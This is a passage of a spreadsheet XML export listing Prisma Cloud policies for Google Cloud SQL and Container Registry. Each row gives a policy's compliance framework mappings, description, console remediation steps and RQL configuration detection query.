        <is>
          <t>CIS Control 10</t>
        </is>
      </c>
      <c r="R2945" t="inlineStr">
        <is>
          <t>10.4</t>
        </is>
      </c>
      <c r="S2945" t="inlineStr">
        <is>
          <t>Policy Status Review,Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2945" t="b">
        <v>0</v>
      </c>
      <c r="U2945" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2945" t="inlineStr">
        <is>
          <t>gcloud-services-list</t>
        </is>
      </c>
      <c r="W2945" t="inlineStr">
        <is>
          <t>This policy identifies GCP accounts where GCR Container Vulnerability Scanning is not enabled. GCR Container Analysis and other third party products allow images stored in GCR to be scanned for known vulnerabilities. Vulnerabilities in software packages can be exploited by hackers or malicious users to obtain unauthorized access to local cloud resources. It is recommended to enable vulnerability scanning for images stored in Google Container Registry.</t>
        </is>
      </c>
      <c r="X2945" t="inlineStr">
        <is>
          <t>1. Login to the GCP console
2. For the reported account, navigate to the GCP service 'Container Registry'(Left Panel)
3. Select the tab 'Settings'
4. To enable the vulnerability scanning, click on the 'TURN ON' button. 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-networking-policies/ensure-gcp-gcr-container-vulnerability-scanning-is-enabled
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-networking-policies/ensure-gcp-gcr-container-vulnerability-scanning-is-enabled</t>
        </is>
      </c>
      <c r="Y2945" t="inlineStr"/>
      <c r="Z2945" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-services-list' AND json.rule = services[?any(name contains containerscanning.googleapis.com and state contains ENABLED)] does not exist
{"category":"General","resourceTypes":["google_project_services"]}</t>
        </is>
      </c>
      <c r="AA2945" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2945" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2945" t="inlineStr">
        <is>
          <t>PC-GCP-SU-614-CKV2_GCP_11</t>
        </is>
      </c>
      <c r="AD2945" t="b">
        <v>1</v>
      </c>
      <c r="AE2945" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2945" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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5" t="inlineStr">
        <is>
          <t>0367679b-7384-4d67-9673-22e6ba99719e</t>
        </is>
      </c>
      <c r="AI2945" t="inlineStr">
        <is>
          <t>71151e4f-b104-43c7-84e1-008d0811d61d</t>
        </is>
      </c>
      <c r="AJ2945" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2945" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2946">
      <c r="A2946" t="inlineStr">
        <is>
          <t>ACSC Information Security Manual (ISM)</t>
        </is>
      </c>
      <c r="B2946" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2946" s="2" t="inlineStr"/>
      <c r="D2946" t="inlineStr"/>
      <c r="E2946" t="inlineStr"/>
      <c r="F2946" t="inlineStr"/>
      <c r="G2946" t="b">
        <v>0</v>
      </c>
      <c r="H29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6" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2946" t="inlineStr">
        <is>
          <t>gcloud-sql</t>
        </is>
      </c>
      <c r="K2946" t="inlineStr">
        <is>
          <t>gcp-sql001-ensure-instance-with-local_infile-db-disabled</t>
        </is>
      </c>
      <c r="L2946" t="inlineStr"/>
      <c r="M2946" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2946" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2946" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2946" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2946" t="inlineStr">
        <is>
          <t>Guidelines for Cyber Security Roles</t>
        </is>
      </c>
      <c r="R2946" t="inlineStr">
        <is>
          <t>ISM-0714</t>
        </is>
      </c>
      <c r="S2946" t="inlineStr"/>
      <c r="T2946" t="b">
        <v>0</v>
      </c>
      <c r="U2946" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2946" t="inlineStr">
        <is>
          <t>gcloud-sql-instances-list</t>
        </is>
      </c>
      <c r="W2946" t="inlineStr"/>
      <c r="X2946" t="inlineStr"/>
      <c r="Y2946" t="inlineStr"/>
      <c r="Z2946" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-sql-instances-list' AND json.rule = settings.databaseFlags[*].name equals local_infile and settings.databaseFlags[*].value equals on</t>
        </is>
      </c>
      <c r="AA2946" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB2946" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2946" t="inlineStr"/>
      <c r="AD2946" t="b">
        <v>0</v>
      </c>
      <c r="AE2946" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2946" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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6" t="inlineStr">
        <is>
          <t>a0b59a21-8b5c-46b4-bbe4-3c3684de8a48</t>
        </is>
      </c>
      <c r="AI2946" t="inlineStr">
        <is>
          <t>9d563f6e-26fd-4465-a959-10fda77a8dd4</t>
        </is>
      </c>
      <c r="AJ2946" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2946" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2947">
      <c r="A2947" t="inlineStr">
        <is>
          <t>HITRUST CSF v.11.2.0, TX-RAMP Level 2, HIPAA, ITSG-33, TX-RAMP Level 2, Insurance Regulatory And Development Authority Of India, Insurance Regulatory And Development Authority Of India, TX-RAMP Level 2, SOC 2, ITSG-33</t>
        </is>
      </c>
      <c r="B2947" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2947" s="2" t="inlineStr"/>
      <c r="D2947" t="inlineStr"/>
      <c r="E2947" t="inlineStr"/>
      <c r="F2947" t="inlineStr"/>
      <c r="G2947" t="b">
        <v>1</v>
      </c>
      <c r="H29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7" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2947" t="inlineStr">
        <is>
          <t>gcloud-sql</t>
        </is>
      </c>
      <c r="K2947" t="inlineStr">
        <is>
          <t>GCP SQL Instance with public IP address does not have authorized network configured</t>
        </is>
      </c>
      <c r="L2947" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2947" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2947" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2947" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2947" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2947" t="inlineStr">
        <is>
          <t>CA</t>
        </is>
      </c>
      <c r="R2947" t="inlineStr">
        <is>
          <t>CA-6:Security Authorization</t>
        </is>
      </c>
      <c r="S2947" t="inlineStr"/>
      <c r="T2947" t="b">
        <v>0</v>
      </c>
      <c r="U2947" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2947" t="inlineStr">
        <is>
          <t>gcloud-sql-instances-list</t>
        </is>
      </c>
      <c r="W2947" t="inlineStr">
        <is>
          <t>This policy identifies GCP Cloud SQL instances with public IP addresses that do not have an authorized network configured.
SQL instance can be connected securely by making use of the Cloud SQL Proxy or by adding the client's public addresses as an authorized network to the SQL instance. If the client application is connecting directly to a Cloud SQL instance on its public IP address, the client's external IP address needs to be added as an Authorized network to allow the secure connection.
It is recommended to add authorized networks for your SQL instance to minimize the access vector.</t>
        </is>
      </c>
      <c r="X2947" t="inlineStr">
        <is>
          <t>If public IP is not needed for the SQL instance, it is recommeded to remove the Public IP from the instance. Any changes to the public IP should be made according to the organization needs and policies.
To remove the public IP for from a SQL instance, please refer to the URLs given below:
For MySQL: https://cloud.google.com/sql/docs/mysql/configure-ip#disable-public
For PostgreSQL: https://cloud.google.com/sql/docs/postgres/configure-ip#disable-public
For SQL Server: https://cloud.google.com/sql/docs/sqlserver/configure-ip#disable-public
If it is deemed that instance needs public IP, it is recommended to add restrictive Authorized Networks to limit allowed public connections to the instance.
To configure authorized networks for a SQL instance, please refer to the URLs given below:
For MySQL: https://cloud.google.com/sql/docs/mysql/authorize-networks
For PostgreSQL: https://cloud.google.com/sql/docs/postgres/authorize-networks
For SQL Server: https://cloud.google.com/sql/docs/sqlserver/authorize-networks</t>
        </is>
      </c>
      <c r="Y2947" t="inlineStr"/>
      <c r="Z2947" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-sql-instances-list' AND json.rule = state equals "RUNNABLE" and ipAddresses[?any( type equal ignore case "PRIMARY" )] exists and settings.ipConfiguration.authorizedNetworks is empty</t>
        </is>
      </c>
      <c r="AA2947" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2947" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2947" t="inlineStr">
        <is>
          <t>PC-GCP-SQL-1109</t>
        </is>
      </c>
      <c r="AD2947" t="b">
        <v>1</v>
      </c>
      <c r="AE2947" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2947" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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7" t="inlineStr">
        <is>
          <t>5926ab5e-f7ae-4e25-8ade-6949c54549b8</t>
        </is>
      </c>
      <c r="AI2947" t="inlineStr">
        <is>
          <t>425a8c04-e9c6-476f-ae1c-1c9c22a60d8a</t>
        </is>
      </c>
      <c r="AJ2947" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2947" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2948">
      <c r="A2948" t="inlineStr">
        <is>
          <t>ISO/IEC 27002:2013, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, Brazilian Data Protection Law (LGPD), Sarbanes Oxley Act (SOX), TX-RAMP Level 1, APRA (CPS 234) Information Security, NYDFS 23 CRR-NY 500.0, Telecommunications Security Act - TSA, ISO/IEC 27017:2015, Copy of CIS Controls v8, kashan ACSC Information Security Manual (ISM), kfirdaus AWS Account-CS, Australian Energy Sector Cyber Security Framework (AESCSF), CRI Profile v2.0, CIS Controls v7.1, ISO/IEC 27002:2013, Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, ITSG-33, Secure Controls Framework (SCF) - 2024.2, NYDFS 23 CRR-NY 500.0, ITSG-33, NIST CSF v2.0, CSA CCM v4.0.12, CSA CCM v.4.0.1, SOC 2, APRA (CPS 234) Information Security, CIS Controls v8.1, ISO 27002:2022, ISO/IEC 27017:2015, CSA CCM v.4.0.1, ISO/IEC 27017:2015, CDC NIST 800-53 Rev4, Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, ISO/IEC 27001:2022, Secure Controls Framework (SCF) - 2022.2.1, APRA (CPS 234) Information Security, ISO 27001:2013, kashan ACSC Information Security Manual (ISM), DORA, Secure Controls Framework (SCF) - 2024.2, Copy of New Zealand Information Security Manual (NZISM v3.4), TX-RAMP Level 1, NIST SP 800-171 Revision 2, Secure Controls Framework (SCF) - 2022.2.1, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, TX-RAMP Level 2, ISO 27001:2013, HITRUST CSF v.11.2.0, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), ACSC Information Security Manual (ISM), TX-RAMP Level 2, Brazilian Data Protection Law (LGPD), CSA CCM v.4.0.1, DORA, CSA CCM v.4.0.1, SOC 2, CIS Controls v7.1, Insurance Regulatory And Development Authority Of India, kfirdaus AWS Account-CS, NIST 800-53 Rev4, Australian Cyber Security Centre (ACSC) Essential Eight, CIS Controls v8, ISO 27001:2013, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, SOC 2, SOC 2, APRA (CPS 234) Information Security, NIST CSF, Copy of ACSC Information Security Manual (ISM)-clone, Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, Fedramp (Moderate), NIST SP 800-172, ISO/IEC 27002:2013, Microsoft Cloud Security Benchmark v1, PCI DSS v3.2.1, New Zealand Information Security Manual (NZISM v3.4), CSA CCM v4.0.12, DORA, ACSC Information Security Manual (ISM), Cybersecurity Maturity Model Certification (CMMC) v.1.02, RBI Baseline Cyber Security and Resilience Requirements, Copy of ACSC Information Security Manual (ISM)-clone</t>
        </is>
      </c>
      <c r="B2948" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2948" s="2" t="inlineStr"/>
      <c r="D2948" t="inlineStr"/>
      <c r="E2948" t="inlineStr"/>
      <c r="F2948" t="inlineStr"/>
      <c r="G2948" t="b">
        <v>1</v>
      </c>
      <c r="H29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8" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2948" t="inlineStr">
        <is>
          <t>gcloud-sql</t>
        </is>
      </c>
      <c r="K2948" t="inlineStr">
        <is>
          <t>GCP SQL MySQL DB instance point-in-time recovery backup (Binary logs) is not enabled</t>
        </is>
      </c>
      <c r="L2948" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2948" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2948" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2948" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2948" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2948" t="inlineStr">
        <is>
          <t>Guidelines for Database Systems</t>
        </is>
      </c>
      <c r="R2948" t="inlineStr">
        <is>
          <t>ISM-1537</t>
        </is>
      </c>
      <c r="S2948" t="inlineStr">
        <is>
          <t>GCP</t>
        </is>
      </c>
      <c r="T2948" t="b">
        <v>0</v>
      </c>
      <c r="U2948" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2948" t="inlineStr">
        <is>
          <t>gcloud-sql-instances-list</t>
        </is>
      </c>
      <c r="W2948" t="inlineStr">
        <is>
          <t>This policy identifies Cloud SQL MySQL DB instances whose point-in-time recovery backup is not enabled. In case of an error, point-in-time recovery helps you recover an instance to a specific point in time. It is recommended to enable automated backups with point-in-time recovery to prevent any data loss in case of an unwanted scenario.</t>
        </is>
      </c>
      <c r="X2948" t="inlineStr">
        <is>
          <t>Follow the below mentioned URL to enable point-in-time recovery backup (Binary logs) for the reported MySQL instance:
https://cloud.google.com/sql/docs/mysql/backup-recovery/pitr 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-storage-gcs-policies/bc-gcp-2-20
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-storage-gcs-policies/bc-gcp-2-20</t>
        </is>
      </c>
      <c r="Y2948" t="inlineStr"/>
      <c r="Z2948" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name='gcloud-sql-instances-list' AND json.rule='$.settings.backupConfiguration.binaryLogEnabled is false and $.databaseVersion contains MYSQL'
{"category":"Storage","resourceTypes":["google_sql_database_instance"]}</t>
        </is>
      </c>
      <c r="AA2948" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2948" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2948" t="inlineStr">
        <is>
          <t>PC-GCP-SQL-84-CKV2_GCP_20</t>
        </is>
      </c>
      <c r="AD2948" t="b">
        <v>1</v>
      </c>
      <c r="AE2948" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2948" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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8" t="inlineStr">
        <is>
          <t>25f41a54-717e-410c-a2ae-fb293dc2ed6d</t>
        </is>
      </c>
      <c r="AI2948" t="inlineStr">
        <is>
          <t>8bdd1d25-660d-4a3d-be5a-c9a96e4b2bb6</t>
        </is>
      </c>
      <c r="AJ2948" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2948" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2949">
      <c r="A2949" t="inlineStr">
        <is>
          <t>CSA CCM v.4.0.6, Sarbanes Oxley Act (SOX), RBI Baseline Cyber Security and Resilience Requirements, PCI DSS v4.0, kashan ACSC Information Security Manual (ISM), Secure Controls Framework (SCF) - 2024.2, kfirdaus AWS Account-CS, Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, ITSG-33, CIS v1.2.0 (GCP), CIS Controls v7.1, ISO 27002:2022, New Zealand Information Security Manual (NZISM v3.4), Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, kashan ACSC Information Security Manual (ISM), CIS Controls v8, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), PCI DSS v4.0, ISO/IEC 27001:2022, ISO 27002:2022, TX-RAMP Level 1, CRI Profile v1.2.1, TX-RAMP Level 2, Microsoft Cloud Security Benchmark v1, ACSC Information Security Manual (ISM), CSA CCM v4.0.12, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), CIS Controls v8.1, Insurance Regulatory And Development Authority Of India, kfirdaus AWS Account-CS, CRI Profile v2.0, CIS v1.3.0 (GCP), Copy of New Zealand Information Security Manual (NZISM v3.4), SOC 2, NIST CSF v2.0, HIPAA, Copy of ACSC Information Security Manual (ISM)-clone, Secure Controls Framework (SCF) - 2022.2.1, PCI DSS v4.0, Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, FFIEC, PCI DSS v4.0, CIS Controls v8.1, CSA CCM v4.0.12, DORA, ACSC Information Security Manual (ISM), Copy of CIS Controls v8, Copy of ACSC Information Security Manual (ISM)-clone</t>
        </is>
      </c>
      <c r="B2949" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2949" s="2" t="inlineStr"/>
      <c r="D2949" t="inlineStr"/>
      <c r="E2949" t="inlineStr"/>
      <c r="F2949" t="inlineStr"/>
      <c r="G2949" t="b">
        <v>1</v>
      </c>
      <c r="H29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49" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2949" t="inlineStr">
        <is>
          <t>gcloud-sql</t>
        </is>
      </c>
      <c r="K2949" t="inlineStr">
        <is>
          <t>GCP PostgreSQL instance database flag log_hostname is not set to off</t>
        </is>
      </c>
      <c r="L2949" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2949" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2949" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2949" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2949" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2949" t="inlineStr">
        <is>
          <t>Guidelines for Database Systems</t>
        </is>
      </c>
      <c r="R2949" t="inlineStr">
        <is>
          <t>ISM-1537</t>
        </is>
      </c>
      <c r="S2949" t="inlineStr"/>
      <c r="T2949" t="b">
        <v>0</v>
      </c>
      <c r="U2949" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2949" t="inlineStr">
        <is>
          <t>gcloud-sql-instances-list</t>
        </is>
      </c>
      <c r="W2949" t="inlineStr">
        <is>
          <t>This policy identifies PostgreSQL database instances in which database flag log_hostname is not set to off. Logging hostnames can incur overhead on server performance as for each statement logged, DNS resolution will be required to convert IP address to hostname. It is recommended to set log_hostname as off.</t>
        </is>
      </c>
      <c r="X2949" t="inlineStr">
        <is>
          <t>1. Log in to GCP console
2. Navigate SQL Instances page
3. Click on reported PostgreSQL instance
4. Click EDIT
5. If the flag has not been set on the instance, 
Under 'Customize your instance', click on 'ADD FLAG' in 'Flags' section, choose the flag 'log_hostname' from the drop-down menu and set the value as 'off'
OR
If the flag has been set to other than off, Under 'Customize your instance', In 'Flags' section choose the flag 'log_hostname' and set the value as 'off'
6. Click on 'DONE' and then 'SAVE' 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/logging-policies-1/bc-google-cloud-108
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/logging-policies-1/bc-google-cloud-108</t>
        </is>
      </c>
      <c r="Y2949" t="inlineStr"/>
      <c r="Z2949" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-sql-instances-list' AND json.rule = "state equals RUNNABLE and databaseVersion contains POSTGRES and (settings.databaseFlags[*].name does not contain log_hostname or settings.databaseFlags[?any(name contains log_hostname and value contains on)] exists)"
{"category":"Logging","resourceTypes":["google_sql_database_instance"]}</t>
        </is>
      </c>
      <c r="AA2949" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2949" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2949" t="inlineStr">
        <is>
          <t>PC-GCP-SQL-751-CKV_GCP_108</t>
        </is>
      </c>
      <c r="AD2949" t="b">
        <v>1</v>
      </c>
      <c r="AE2949" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2949" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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49" t="inlineStr">
        <is>
          <t>96c7404f-856a-42df-b4ea-61b3486806a5</t>
        </is>
      </c>
      <c r="AI2949" t="inlineStr">
        <is>
          <t>e4885f20-2e9d-4dab-aa72-61dff2ebda66</t>
        </is>
      </c>
      <c r="AJ2949" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2949" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2950">
      <c r="A2950" t="inlineStr">
        <is>
          <t>CIS v3.0.0 (GCP) Level 1, CIS v2.0.0 (GCP) Level 1</t>
        </is>
      </c>
      <c r="B2950" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2950" s="2" t="inlineStr"/>
      <c r="D2950" t="inlineStr"/>
      <c r="E2950" t="inlineStr"/>
      <c r="F2950" t="inlineStr"/>
      <c r="G2950" t="b">
        <v>1</v>
      </c>
      <c r="H29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0" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2950" t="inlineStr">
        <is>
          <t>gcloud-sql</t>
        </is>
      </c>
      <c r="K2950" t="inlineStr">
        <is>
          <t>GCP SQL server instance database flag 3625 (trace flag) is not set to on</t>
        </is>
      </c>
      <c r="L2950" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2950" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2950" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2950" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2950" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2950" t="inlineStr">
        <is>
          <t>6</t>
        </is>
      </c>
      <c r="R2950" t="inlineStr">
        <is>
          <t>6.3.6</t>
        </is>
      </c>
      <c r="S2950" t="inlineStr"/>
      <c r="T2950" t="b">
        <v>0</v>
      </c>
      <c r="U2950" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2950" t="inlineStr">
        <is>
          <t>gcloud-sql-instances-list</t>
        </is>
      </c>
      <c r="W2950" t="inlineStr">
        <is>
          <t>This policy identifies GCP SQL server instance for which database flag 3625 (trace flag) is not set to on. Trace flag can help prevent the disclosure of sensitive information by masking the parameters of some error messages using '*', for users who are not members of the sysadmin fixed server role. It is recommended to set 3625 (trace flag) database flag for Cloud SQL SQL Server instance to on.</t>
        </is>
      </c>
      <c r="X2950" t="inlineStr">
        <is>
          <t>1. Log in to GCP console
2. Navigate SQL Instances page
3. Click on reported SQL server instance
4. Click on EDIT
5. If the flag has not been set on the instance, 
Under 'Flags and parameters', click on 'ADD FLAG' in 'New database flag' section, choose the flag '3625' from the drop-down menu and set the value as 'On'
OR
If the flag has been set to other than on, Under 'Flags and parameters', choose the flag '3625' and set the value as 'On'
6. Click on DONE
7. Click on SAVE</t>
        </is>
      </c>
      <c r="Y2950" t="inlineStr"/>
      <c r="Z2950" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-sql-instances-list' AND json.rule = "databaseVersion contains SQLSERVER and state equals RUNNABLE and (settings.databaseFlags[*].name does not contain 3625 or settings.databaseFlags[?any(name contains 3625 and value contains off)] exists)"</t>
        </is>
      </c>
      <c r="AA2950" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2950" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2950" t="inlineStr">
        <is>
          <t>PC-GCP-SQL-901</t>
        </is>
      </c>
      <c r="AD2950" t="b">
        <v>1</v>
      </c>
      <c r="AE2950" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2950" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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0" t="inlineStr">
        <is>
          <t>4eb4e425-8223-4537-9247-1f762223baaa</t>
        </is>
      </c>
      <c r="AI2950" t="inlineStr">
        <is>
          <t>f71d0398-27c7-414b-8347-c1893840da0a</t>
        </is>
      </c>
      <c r="AJ2950" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2950" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2951">
      <c r="A2951" t="inlineStr">
        <is>
          <t>Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, Secure Controls Framework (SCF) - 2022.2.1, kashan ACSC Information Security Manual (ISM), TX-RAMP Level 1, APRA (CPS 234) Information Security, NYDFS 23 CRR-NY 500.0, Secure Controls Framework (SCF) - 2022.2.1, APRA (CPS 234) Information Security, Telecommunications Security Act - TSA, Copy of CIS Controls v8, APRA (CPS 234) Information Security, ITSG-33, kfirdaus AWS Account-CS, CRI Profile v2.0, CIS Controls v7.1, CIS v2.0.0 (GCP) Level 1, HITRUST CSF v.11.2.0, NYDFS 23 CRR-NY 500.0, Copy of ACSC Information Security Manual (ISM)-clone, ACSC Information Security Manual (ISM), NIST CSF v2.0, CSA CCM v4.0.12, SOC 2, APRA (CPS 234) Information Security, CIS Controls v8.1, ISO 27002:2022, CIS v1.3.0 (GCP), NIST 800-53 Rev 5, Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, ISO/IEC 27001:2022, kashan ACSC Information Security Manual (ISM), DORA, Secure Controls Framework (SCF) - 2024.2, Cybersecurity Maturity Model Certification (CMMC) v.1.02, Copy of New Zealand Information Security Manual (NZISM v3.4), HITRUST v.9.4.2 [Deprecated], HITRUST v.9.4.2 [Deprecated], TX-RAMP Level 2, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, HITRUST CSF v.11.2.0, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), Rehan, kfirdaus AWS Account-CS, DORA, CIS Controls v7.1, APRA (CPS 234) Information Security, Australian Cyber Security Centre (ACSC) Essential Eight, CIS Controls v8, APRA (CPS 234) Information Security, NIST SP 800-171 Revision 2, Copy of ACSC Information Security Manual (ISM)-clone, NIST SP 800-172, Microsoft Cloud Security Benchmark v1, CIS v3.0.0 (GCP) Level 1, New Zealand Information Security Manual (NZISM v3.4), APRA (CPS 234) Information Security, ACSC Information Security Manual (ISM), Sarbanes Oxley Act (SOX), CIS v1.1.0 (GCP), CIS v1.2.0 (GCP), RBI Baseline Cyber Security and Resilience Requirements, Brazilian Data Protection Law (LGPD), NIST CSF, PCI DSS v3.2.1</t>
        </is>
      </c>
      <c r="B2951" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2951" s="2" t="inlineStr"/>
      <c r="D2951" t="inlineStr"/>
      <c r="E2951" t="inlineStr"/>
      <c r="F2951" t="inlineStr"/>
      <c r="G2951" t="b">
        <v>1</v>
      </c>
      <c r="H29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1" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2951" t="inlineStr">
        <is>
          <t>gcloud-sql</t>
        </is>
      </c>
      <c r="K2951" t="inlineStr">
        <is>
          <t>GCP SQL database instance is not configured with automated backups</t>
        </is>
      </c>
      <c r="L2951" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
